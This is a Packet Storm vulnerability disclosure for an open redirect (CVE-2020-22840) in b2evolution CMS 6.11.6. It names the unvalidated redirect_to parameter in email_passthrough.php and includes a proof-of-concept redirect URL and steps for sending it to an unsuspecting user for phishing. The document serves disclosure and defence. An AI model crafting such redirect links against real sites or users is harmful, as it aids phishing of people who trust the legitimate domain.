Lucene search
Nakul RattiPACKETSTORM:161362HistoryFeb 10, 2021 - 12:00 a.m.
b2evolution CMS 6.11.6 Open Redirection
2021-02-1000:00:00
Nakul Ratti
packetstormsecurity.com
332
`# Exploit Title: *Open redirect in b2evolution CMS 6.11.6 redirect_to
parameter in email_passthrough.php*
# Google Dork: N/A
# Date: 10/02/2021
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage: https://b2evolution.net/
# Software Link:
https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux
# CVE : *CVE-2020-22840*
Vulnerable File:
--------------------------
http://host/htsrv/email_passthrough.php <http://host/evoadm.php>
Vulnerable Issue:
--------------------------
redirect_to parameter has no input validation/domain whitelisting.
--------------------------Proof of Concept-----------------------
Steps to Reproduce:
1. Send the following link :
*http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com
<http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com>*
to
the unsuspecting user
2. The user will be redirected to Google.com or any other attacker
controlled domain
3. This can be used to perform malicious phishing campaigns on unsuspecting
users
`
Related
osv
osv
CVE-2020-22840
2021-02-09 14:15:14
nuclei
nuclei
b2evolution CMS <6.11.6 - Open Redirect
2021-02-23 22:30:32
prion
prion
Open redirect
2021-02-09 14:15:00
cve
cve
CVE-2020-22840
2021-02-09 14:15:00
exploitdb
exploitdb
b2evolution 6.11.6 - 'redirect_to' Open Redirect
2021-02-11 00:00:00
Related for PACKETSTORM:161362